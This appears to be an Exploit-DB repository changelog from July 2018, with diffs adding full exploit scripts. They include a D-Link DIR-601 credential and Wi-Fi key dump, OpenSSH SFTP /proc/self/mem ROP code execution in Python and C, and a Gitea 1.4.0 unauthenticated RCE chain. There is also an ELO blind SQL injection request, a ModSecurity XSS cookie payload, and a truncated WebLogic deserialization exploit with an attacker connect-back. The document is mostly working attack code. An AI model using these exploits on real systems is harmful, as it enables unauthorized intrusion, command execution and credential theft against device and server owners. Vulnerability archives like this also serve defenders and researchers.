DB: 2018-07-11

9 changes to exploits/shellcodes

HID discoveryd - command_blink_on Unauthenticated RCE (Metasploit)
HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)
OpenSSH < 6.6 SFTP (x64) - Command Execution
OpenSSH < 6.6 SFTP - Command Execution

ModSecurity 3.0.0 - Cross-Site Scripting
Gitea 1.4.0 - Remote Code Execution
WolfSight CMS 3.2 - SQL Injection
Oracle WebLogic 12.1.2.0 - RMI Registry UnicastRef Object Java Deserialization Remote Code Execution
Elektronischer Leitz-Ordner 10 - SQL Injection
D-Link DIR601 2.02 - Credential Disclosure

exploits/hardware/webapps/45002.py

@@ -0,0 +1,121 @@
+# Exploit title: D-Link DIR601 2.02NA - Credential disclosure
+# Date: 2018-07-10
+# Exploit Author: Richard Rogerson
+# Vendor Homepage: http://ca.dlink.com/
+# Software Link: http://support.dlink.ca/ProductInfo.aspx?m=DIR-601
+# Version: <= 2.02NA
+# Tested on: D-Link DIR601 Firmware 2.02NA
+# Contact: http://twitter.com/pktlabs
+# Website: https://www.packetlabs.net
+# CVE: N/A 
+# Category: Webapps, Remote
+
+
+# 1. Description:
+# Through analyzing the Captcha function implemented in the DIR-601 (2.02NA firmware), 
+# a HTTP request was found responsible for the handoff to client-side code. 
+# Inspecting the HTTP requests, it was identified that a parameter named ‘table_name’ 
+# is used to instruct the back-end application which content to return. By abusing this
+# request, it was found possible to retrieve sensitive information relating to the device
+# configuration and administrative credentials.
+
+# It is possible to modify the HTTP POST to my_cgi.cgi and include as table_name references
+# to retrieve the administrative credentials, wireless ssid, and pre-shared key where 
+# applicable. Enumerating the naming conventions within the client-side code, it was
+# determined that a number of potentially sensitive parameters/tables exist in the
+# back-end environment which provide significant value if retrieved, four of these include:
+
+# -	Admin_user
+# -	Wireless_settings
+# -	Wireless_security
+# -	Wireless_wpa_settings
+
+Sample of the vulnerable POST request:
+
+HTTP Request
+POST /my_cgi.cgi HTTP/1.1
+Host: 192.168.0.1
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Referer: http://192.168.0.1/login_real.htm
+Content-Length: 86
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+
+request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user <- additional table requested
+
+Sample response:
+
+HTTP Response
+HTTP/1.1 200 OK
+Content-type: text/xml
+Connection: close
+Date: Sat, 01 Jan 2011 00:57:12 GMT
+Server: lighttpd/1.4.28
+Content-Length: 228
+
+<?xml version="1.0"?><root><login_level>1</login_level><show_authid>50649</show_authid><admin_user><admin_user_name>admin</admin_user_name><admin_user_pwd>clear-text-password</admin_user_pwd><admin_level>1</admin_level></admin_user></root>
+
+
+# 2. Exploit Code:
+
+#!/usr/bin/python
+import socket,sys,urllib,urllib2
+import xml.etree.ElementTree as ET
+
+print """Packetlabs
+====================================
+D-Link DIR-601 Authorization Bypass
+"""
+if len(sys.argv) != 2:
+	print "usage:",sys.argv[0],"<ipaddr>"
+	sys.exit()
+else:
+    ipaddr=sys.argv[1]
+    print "Retrieving admin username, password and wireless security configuration from",ipaddr
+
+# build URL
+url = 'http://'
+url+= ipaddr
+url+='/my_cgi.cgi'
+data = "request=no_auth&request=load_settings&table_name=admin_user&table_name=user_user&table_name=wireless_settings&table_name=wireless_security&table_name=wireless_wpa_settings"
+
+# send payload
+req = urllib2.Request(url, data)
+response = urllib2.urlopen(req)
+print "Sending payload to:",response.geturl()
+retr = response.read()
+root = ET.fromstring(retr)
+
+# credential dump
+print "\r\nAdmin Creds"
+print "username:",root[0][0].text
+print "password:",root[0][1].text
+
+# dump wireless settings
+print "\r\nWireless Settings"
+sectype=int(root[3][0].text)
+ssid=root[2][2].text
+enctype="none"
+
+print "SSID is:", ssid
+if sectype == 2:
+	enctype="WPA2"
+	key=root[4][3].text
+elif sectype == 1:
+	enctype="WEP("
+	keylength=int(root[3][3].text)
+	if keylength == 5:
+            enctype+="64bit)"
+	    key=root[3][5].text
+	elif keylength == 13:
+            enctype+="128bit)"
+	    key=root[3][9].text
+	else:
+	    key="Error, please inspect xml manually above, keylength=",keylength
+            print retr
+elif sectype == 0:
+	print "Wireless network is open?"
+	sys.exit()
+
+print enctype,"key is:",key

exploits/linux/remote/45001.py

@@ -0,0 +1,114 @@
+# OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
+# The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
+#
+# Adam Simuntis :: https://twitter.com/adamsimuntis
+# Mindaugas Slusnys :: https://twitter.com/mislusnys
+
+import paramiko
+import sys
+import time
+from pwn import *
+
+# parameters
+cmd = 'touch /tmp/pwn; touch /tmp/pwn2'
+host = '172.16.15.59'
+port = 22
+username = 'secforce'
+password = 'secforce'
+
+# connection
+ssh = paramiko.SSHClient()
+ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+ssh.connect(hostname = host, port = port, username = username, password = password)
+sftp = ssh.open_sftp()
+
+# parse /proc/self/maps to get addresses
+log.info("Analysing /proc/self/maps on remote system")
+sftp.get('/proc/self/maps','maps')
+with open("maps","r") as f:
+    lines = f.readlines()
+    for line in lines:
+        words = line.split()
+        addr = words[0]
+        if ("libc" in line and "r-xp" in line):
+            path = words[-1]
+            addr = addr.split('-')
+            BITS = 64 if len(addr[0]) > 8 else 32
+            print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
+            libc_base = int(addr[0], 16)
+            libc_path = path
+        if ("[stack]" in line):
+            addr = addr.split("-")
+            saddr_start = int(addr[0], 16)
+            saddr_end = int(addr[1], 16)
+            print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])
+
+# download remote libc and extract information
+print "[+] Fetching libc from remote system..\n"
+sftp.get(str(libc_path), 'libc.so')
+e = ELF("libc.so")
+sys_addr = libc_base + e.symbols['system']
+exit_addr = libc_base + e.symbols['exit']
+
+# gadgets for the RET slide and system()
+if BITS == 64:
+    pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
+    ret_addr = pop_rdi_ret + 1
+else:
+    ret_addr = libc_base + next(e.search('\xc3'))
+
+print "\n[+] system()  @ {}".format(hex(sys_addr))
+print "[+] 'ret' @ {}".format(hex(ret_addr))
+if BITS == 64:
+    print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))
+
+with sftp.open('/proc/self/mem','rw') as f:
+    if f.writable():
+        print "[+] We have r/w permissions for /proc/self/mem! All Good."
+    else:
+        print "[-] Fatal error. No r/w permission for mem."
+        sys.exit(0)
+
+    log.info("Patching /proc/self/mem on the remote system")
+
+    stack_size = saddr_end - saddr_start
+    new_stack = ""
+
+    print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
+    #sleep(20)
+    if BITS == 32:
+        new_stack += p32(ret_addr) * (stack_size/4)
+        new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
+        new_stack += p32(sys_addr)
+        new_stack += p32(exit_addr)
+        new_stack += p32(saddr_start)
+    else:
+        new_stack += p64(ret_addr) * (stack_size/8)
+        new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
+        new_stack += p64(pop_rdi_ret)
+        new_stack += p64(saddr_start)
+        new_stack += p64(sys_addr)
+        new_stack += p64(exit_addr)
+
+    # debug info
+    with open("fake_stack","w") as lg:
+        lg.write(new_stack)
+
+    # write cmd to top off the stack
+    f.seek(saddr_start)
+    f.write(cmd + "\x00")
+
+    # write the rest from bottom up, we're going to crash at some point
+    for off in range(stack_size - 32000, 0, -32000):
+        cur_addr = saddr_start + off
+
+        try:
+            f.seek(cur_addr)
+            f.write(new_stack[off:off+32000])
+        except:
+            print "Stack write failed - that's probably good!"
+            print "Check if you command was executed..."
+            sys.exit(0)
+
+sftp.close()
+ssh.close()

exploits/linux/webapps/44970.txt

@@ -1,20 +0,0 @@
-# Exploit Title: ModSecurity 3.0.0 - Cross-Site Scripting
-# Date: 2018-07-02
-# Vendor Homepage: https://www.modsecurity.org
-# Software: ModSecurity
-# Category: Web Application Firewall
-# Exploit Author: Adipta Basu
-# Tested on: Mac OS High Sierra
-# CVE: N/A
-# Description: ModSecurity 3.0.0 has XSS via an onError attribute of an IMG element
-
-# Details: 
-# After doing source code analysis, I found that if <img src=x onError=prompt(111)> 
-# is passed as a parameter, a pop-up is obtained. This is because the filter flags 
-# terms like "script","alert",etc. Moreover it also flags if there is a string placed
-# inside the first bracket. That is why I had to use 111. However document.cookie when
-# passed works fine.
- 
-Reproduction Steps:
- 
-   - Use <img src=x onError=prompt(3)> or <img src=x onError=prompt(document.cookie)>

exploits/linux/webapps/44999.txt

@@ -0,0 +1,57 @@
+# Title: Elektronischer Leitz-Ordner 10 - SQL Injection
+# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+# Software: https://www.elo.com/en-de/
+# CVE: N/A
+# Affected Products:
+# ELOenterprise 10 (ELO Access Manager <= 10.17.120)
+# ELOenterprise 9 (ELO Access Manager <= 9.17.120)
+# ELOprofessional 10 (ELO Access Manager <= 10.17.120)
+# ELOprofessional 9 (ELO Access Manager <= 9.17.120)
+
+
+
+# Description: 
+# ELO is a commercial software product for managing documents and
+# electronic content. Storage and organization is similar to classic
+# paper-based document management. ELO belongs to the category of document
+# management (DMS) and enterprise content management systems (ECM). DMS
+# and ECM systems enable audit-proof archiving of documents and
+# information requiring storage.
+
+# We have discovered a time-based blind SQL injection vulnerability in the
+# ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes
+# it possible to read all database content. The vulnerability exists in
+# the HTTP GET parameter "ticket". For example, we succeeded in reading
+# the password hash of the administrator user in the "userdata" table from
+# the "eloam" database.
+
+# Proof of Concept:
+
+GET
+/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
+IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
+NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
+(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
+name),5,1))>104) WAITFOR DELAY '0:0:1'--
+qvAV&after=1523013041889&lang=de&_dc=1523013101769 HTTP/1.1
+Accept-Encoding: gzip,deflate
+Connection: close
+Accept: */*
+Host: server:9090
+Referer: http://server:9090/wf-NAME/social/api/feed/aggregation/201803310000
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv: 59.0) Gecko/20100101
+Firefox/59.0
+
+HTTP/1.1 401 Unauthorized
+Server: Apache-Coyote/1.1
+Content-Type: application/json;charset=UTF-8
+Content-Length: 410
+Date: Fri, 06 Apr 2018 11:57:15 GMT
+Connection: close
+
+{"error":{"code":401,"message":"[TICKET:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0027
+IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
+NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
+(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
+name),5,1))\u003e104) WAITFOR DELAY \u00270][ELOIX:2001]Sitzungskennung
+ung..ltig oder abgelaufen. Melden Sie sich neu an.[NO-DETAILS]"}}

exploits/linux_x86-64/remote/45000.c

@@ -0,0 +1,196 @@
+#define _GNU_SOURCE
+
+// THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
+// TRY TO ATTACK BACK, THE CODE IS SLOPPY!
+// (In other words, please don't use this against other people's machines.)
+
+#include <libssh/libssh.h>
+#include <libssh/sftp.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <string.h>
+#include <errno.h>
+
+#define min(a,b) (((a)<(b))?(a):(b))
+
+sftp_session sftp;
+
+size_t grab_file(char *rpath, char **out) {
+  size_t allocated = 4000, used = 0;
+  *out = calloc(1, allocated+1);
+  sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
+  if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
+  while (1) {
+    ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
+    if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
+    if (nbytes == 0) {
+      (*out)[used] = '\0';
+      sftp_close(f);
+      return used;
+    }
+    used += nbytes;
+    if (used == allocated) {
+      allocated *= 4;
+      *out = realloc(*out, allocated);
+    }
+  }
+}
+
+void dump_file(char *name, void *buf, size_t len) {
+  FILE *f = fopen(name, "w+");
+  if (!f) perror("can't write to local file"), exit(1);
+  if (fwrite(buf, 1, len, f) != len) fprintf(stderr, "local write failed\n"), exit(1);
+  if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
+}
+
+size_t slurp_file(char *path, char **out) {
+  size_t allocated = 4000, used = 0;
+  *out = calloc(1, allocated+1);
+  FILE *f = fopen(path, "r");
+  if (f == NULL) perror("opening local file failed"), exit(1);
+  while (1) {
+    ssize_t nbytes = fread(*out+used, 1, allocated-used, f);
+    if (nbytes < 0) fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno)), exit(1);
+    if (nbytes == 0) {
+      (*out)[used] = '\0';
+      if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
+      return used;
+    }
+    used += nbytes;
+    if (used == allocated) {
+      allocated *= 4;
+      *out = realloc(*out, allocated);
+    }
+  }
+}
+
+int main(int argc, char **argv) {
+  if (argc != 4) fprintf(stderr, "invocation: ./exploit host user 'shell commands here'\n"), exit(1);
+  char *target_host = argv[1];
+  char *target_user = argv[2];
+  char *shell_commands = argv[3];
+
+  ssh_session my_ssh_session;
+  int rc;
+  char *password;
+  // Open session and set options
+  my_ssh_session = ssh_new();
+  if (my_ssh_session == NULL) exit(-1);
+  ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
+  ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
+  // Connect to server
+  rc = ssh_connect(my_ssh_session);
+  if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+
+  // Authenticate ourselves
+  password = getpass("Password: ");
+  rc = ssh_userauth_password(my_ssh_session, NULL, password);
+  if (rc != SSH_AUTH_SUCCESS)
+    fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+  
+  sftp = sftp_new(my_ssh_session);
+  if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+
+  rc = sftp_init(sftp);
+  if (rc != SSH_OK) {
+    fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
+    sftp_free(sftp);
+    return rc;
+  }
+
+  char *mappings;
+  grab_file("/proc/self/maps", &mappings);
+  //printf("/proc/self/maps dump: \n%s\n\n\n", mappings);
+
+  printf("got /proc/self/maps. looking for libc...\n");
+  // 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466                    /lib/x86_64-linux-gnu/libc-2.13.so
+  long long start_addr, end_addr, offset;
+  char *libc_path = NULL;
+  long long stack_start_addr = 0, stack_end_addr;
+  for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
+    if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
+      if (libc_path) fprintf(stderr, "warning: two times libc?\n");
+      printf("mapping line: %s\n", p);
+      if (sscanf(p, "%Lx-%Lx %*4c %Lx", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
+      libc_path = strdup(strchr(p, '/'));
+      if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
+    }
+    if (strstr(p, "[stack]")) {
+      if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
+      printf("mapping line: %s\n", p);
+      if (sscanf(p, "%Lx-%Lx ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
+    }
+  }
+  if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
+  if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
+  printf("remote libc is at %s\n", libc_path);
+  printf("offset %Lx from libc is mapped to %Lx-%Lx\n", offset, start_addr, end_addr);
+
+  char *libc;
+  size_t libc_size = grab_file(libc_path, &libc);
+  dump_file("libc.so", libc, libc_size);
+  printf("downloaded libc, size is %zu bytes\n", libc_size);
+
+  system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
+  char *system_offset_str;
+  slurp_file("system.addr", &system_offset_str);
+  long long system_offset;
+  if (sscanf(system_offset_str, "%Lx", &system_offset) != 1) perror("scanf failed"), exit(1);
+  long long remote_system_addr = start_addr+system_offset-offset;
+  printf("remote system() function is at %Lx\n", remote_system_addr);
+
+  printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
+  char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
+  if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
+  long long gadget_address = start_addr + (gadget-(libc+offset));
+  long long ret_address = gadget_address+1;
+  printf("found gadget at %Lx\n", gadget_address);
+
+  printf("remote stack is at %Lx-%Lx\n", stack_start_addr, stack_end_addr);
+  printf("doing it the quick-and-dirty way (that means: pray that the target"
+         "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
+  long long stack_len = stack_end_addr - stack_start_addr;
+  /*if (stack_len > 32000) {
+    stack_len = 32000;
+    stack_start_addr = stack_end_addr - stack_len;
+  }*/
+  char *new_stack = malloc(stack_len);
+
+  // first fill it with our ret slide
+  for (long long *s = (void*)new_stack; s<(long long*)(new_stack+stack_len); s++) {
+    *s = ret_address;
+  }
+
+  // put some shell commands in the head
+  strcpy(new_stack, shell_commands);
+
+  // put the mini-ROP-chain at the end
+  // [address of pop rdi] [stack head] [address of system]
+  long long *se = (void*)(new_stack + stack_len);
+  se[-3] = gadget_address;
+  se[-2] = stack_start_addr;
+  se[-1] = remote_system_addr;
+
+  printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
+  sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
+  if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);
+
+  // first send over the string
+  rc = sftp_seek64(mem, stack_start_addr);
+  if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
+  ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
+  if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");
+
+  // now send over the rest right-to-left
+  for (long long off = stack_len-32000; off >= 0; off -= 32000) {
+    rc = sftp_seek64(mem, stack_start_addr+off);
+    if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
+    mem_written = sftp_write(mem, new_stack+off, 32000);
+    if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good :)\n"), exit(0);
+  }
+
+  return 0;
+}

exploits/multiple/webapps/44996.py

@@ -0,0 +1,200 @@
+# pip install PyJWT requests
+# pip install dulwich==0.19.0
+from requests import Request, Session, get, post
+import jwt
+import time
+import base64
+import os
+import re
+import time
+import threading
+import random
+import string
+import urlparse
+import urllib
+from dulwich import porcelain
+
+print "Gitea 1.4.0"
+print "Unauthenticated Remote Code Execution"
+print "by Kacper Szurek"
+print "https://security.szurek.pl/"
+print "https://twitter.com/KacperSzurek"
+print "https://www.youtube.com/c/KacperSzurek"
+
+def decode_base64(data):
+    missing_padding = len(data) % 4
+    if missing_padding != 0:
+        data += '='* (4 - missing_padding)
+    return base64.urlsafe_b64decode(data)
+
+def get_random():
+	return ''.join(random.choice(string.lowercase) for x in range(6))
+
+def get_csrf(path):
+	temp = s.get("{}{}".format(url, path))
+
+	content = temp.text.encode("utf-8")
+
+	csrf = re.search('name="_csrf" content="([^"]+)"', content)
+
+	if not csrf:
+		print "[-] Cannot get CSRF token"
+		os._exit(0)
+
+	return csrf.group(1)
+
+command = "whoami"
+url = 'http://192.168.1.103:3000/'
+session_value = '11session'
+
+r = get('{}api/v1/repos/search?limit=1'.format(url))
+try:
+	out = r.json()['data']
+except:
+	print "[-] Probably not gitea url"
+	os._exit(0)
+
+if len(out) != 1:
+	print "[-] There is no public repos"
+	os._exit(0)
+
+out = out[0]
+
+public_repo_id = int(out['id'])
+public_user_id = int(out['owner']['id'])
+public_repo_url = out['full_name']
+
+print "[+] Found public repo {} ID {}".format(public_repo_url, public_repo_id)
+
+json = {
+	"Oid": "....custom/conf/app.ini",
+	"Size": 1000000, # This needs to be bigger than file
+	"User" : "a",
+	"Password" : "a",
+	"Repo"  : "a",
+	"Authorization" : "a"
+}
+
+s = Session()
+
+r  = s.post('{}{}.git/info/lfs/objects'.format(url, public_repo_url), json=json, headers={'Accept': 'application/vnd.git-lfs+json'})
+if '"Unauthorized"' not in r.text or '"expires_at"' not in r.text:
+	print "[-] Cannot create fake OID for app.ini"
+	os._exit(0)
+
+print "[+] Fake OID for app.ini created"
+
+r = get(r'{}{}.git/info/lfs/objects/....custom%2fconf%2fapp.ini/sth'.format(url, public_repo_url))
+
+if "RUN_USER" not in r.text:
+	print "[-] Cannot get app.ini"
+	os._exit(0)
+
+
+secret_match = re.search('LFS_JWT_SECRET *= *(.*?)[\r\n]', r.text)
+if not secret_match:
+	print "[-] Cannot find JWT secret in app.ini"
+	os._exit(0)
+
+jwt_secret = str(secret_match.group(1).strip())
+print "[+] Found secret: {}-".format(jwt_secret)
+jwt_secret = decode_base64(jwt_secret)
+
+# This needs to be INT, not STR
+current_time = int(time.time())-(60*60*24*1000)
+current_time2 = int(time.time())+(60*60*24*1000)
+token = jwt.encode({'user': public_user_id, 'repo': public_repo_id, 'op': 'upload', 'exp': current_time2, 'nbf': current_time}, jwt_secret, algorithm='HS256')
+
+print "[+] Generate jwt token for user {} and repo {}".format(public_user_id, public_repo_id)
+print token
+
+json['Oid'] = '....data/sessions/1/1/{}'.format(session_value)
+
+r  = s.post('{}{}.git/info/lfs/objects'.format(url, public_repo_url), json=json, headers={'Accept': 'application/vnd.git-lfs+json'})
+if '"Unauthorized"' not in r.text or '"expires_at"' not in r.text:
+	print "[-] Cannot create fake OID for session"
+	os._exit(0)
+
+print "[+] Fake OID for session created"
+
+def race_condition_thread():
+	print "\n[+] Race condition thread started"
+	ts = Session()
+	req = Request('PUT', r'{}{}.git/info/lfs/objects/....data%2fsessions%2f1%2f1%2f{}'.format(url, public_repo_url, session_value) , data=open('session.tmp', "rb").read())
+	prepped = req.prepare()
+	# We need to set explicit big content length for race condition
+	prepped.headers['Content-Length'] = 150000
+	prepped.headers['Accept'] = 'application/vnd.git-lfs'
+	prepped.headers['Content-Type'] = 'application/vnd.git-lfs'
+	prepped.headers['Authorization'] = 'Bearer {}'.format(token)
+	# This will hang because of big Content-Length
+	response = ts.send(prepped)
+	print "\n[-] Race condition thread ended before exploit finish, try again"
+
+thread = threading.Thread(target=race_condition_thread, args=())
+thread.daemon = True
+thread.start()
+print "\n[+] Sleep 5 seconds"
+time.sleep(5)
+
+print "[+] Try using fake cookie: {}".format(session_value)
+
+s = Session()
+s.headers.update({'Cookie': 'i_like_gitea={}.tmp;'.format(session_value)})
+
+r = s.get('{}api/v1/user'.format(url))
+data = r.json()
+
+if not "id" in data or data['id'] != 1:
+	print "[-] Impersonation failed"
+	os._exit(0)
+
+user_name = data['login']
+user_id = data['id']
+
+print "[+] Login as {} ID {}".format(user_name, user_id)
+
+csrf = get_csrf('user/settings/applications')
+post_token = s.post('{}user/settings/applications'.format(url), data={'_csrf':csrf, 'name':get_random()}, allow_redirects=False)
+
+try:
+	login_token = post_token.cookies['macaron_flash']
+	login_token = dict(urlparse.parse_qsl(urllib.unquote(login_token)))
+	login_token = login_token['info']
+except:
+	print "[-] Cannot create token"
+	os._exit(0)
+
+print "[+] Login token: {}".format(login_token)
+
+csrf = get_csrf('repo/create')
+admin_repo_name = get_random()
+
+print "[+] Try create repo {}".format(admin_repo_name)
+
+repo_post = s.post("{}repo/create".format(url), data={'_csrf':csrf, 'uid':user_id, 'repo_name':admin_repo_name, 'readme': 'Default', 'auto_init':'on'}, allow_redirects=False)
+
+if repo_post.status_code != 302:
+	print "[-] Cannot create admin repo"
+	os._exit(0)
+
+csrf = get_csrf('{}/{}/settings/hooks/git/update'.format(user_name, admin_repo_name))
+hook_posts = s.post('{}{}/{}/settings/hooks/git/update'.format(url, user_name, admin_repo_name), data={'_csrf':csrf, 'content':"#!/bin/sh\n{}>objects/info/exploit".format(command)}, allow_redirects=False)
+
+if hook_posts.status_code != 302:
+	print "[-] Cannot updatehook"
+	os._exit(0)
+
+clone_url = '{}{}:{}@{}{}/{}.git'.format(url[0:7], login_token, "", url[7:], user_name, admin_repo_name)
+
+temp_repo_dir = get_random()
+r = porcelain.clone(clone_url, temp_repo_dir)
+porcelain.commit(r, get_random())
+porcelain.push(r, clone_url, "master")
+
+command_output = s.get('{}{}/{}/objects/info/exploit'.format(url, user_name, admin_repo_name))
+if command_output.status_code != 200:
+	print "[-] Cannot get exploit output"
+	os._exit(0)
+	
+print command_output.text.encode("utf-8")

exploits/multiple/webapps/44998.py

@@ -0,0 +1,146 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+from argparse import RawTextHelpFormatter
+import socket, argparse, subprocess, ssl, os.path
+
+HELP_MESSAGE = '''
+--------------------------------------------------------------------------------------
+Developped by bobsecq: quentin.hardy@protonmail.com (quentin.hardy@bt.com)
+
+This script is the first public exploit/POC for:
+- Exploiting CVE-2017-3248 (Oracle WebLogic RMI Registry UnicastRef Object Java Deserialization Remote Code Execution)
+- Checking if a weblogic server is vulnerable
+
+This script needs the last version of Ysoserial (https://github.com/frohoff/ysoserial)
+
+Version affected (according to Oracle):
+- 10.3.6.0
+- 12.1.3.0
+- 12.2.1.0
+- 12.2.1.1
+--------------------------------------------------------------------------------------
+'''
+'''
+Tested on 12.1.2.0
+
+For technical information, see:
+- https://www.tenable.com/security/research/tra-2017-07
+- http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
+
+Vulnerability identified by Jacob Baines (Tenable Network Security)
+but exploit/POC has not been published!
+'''
+
+#COMMANDS
+ARGS_YSO_GET_PAYLOD = "JRMPClient {0}:{1} |xxd -p| tr -d '\n'" #{0}: IP, {1}: port for connecting 'back' (i.e. attacker IP)
+CMD_GET_JRMPCLIENT_PAYLOAD = "java -jar {0} {1}"# {0} YSOSERIAL_PATH, {1}ARGS_YSO_GET_PAYLOD
+CMD_YSO_LISTEN = "java -cp {0} ysoserial.exploit.JRMPListener {1} {2} '{3}'"# {0} YSOSERIAL_PATH, {1}PORT, {2}payloadType, {3}command
+
+#PAYLOADS
+#A. Packet 1 to send:
+payload_1 = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'
+#B. Packet 2 to send:
+payload_2 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d31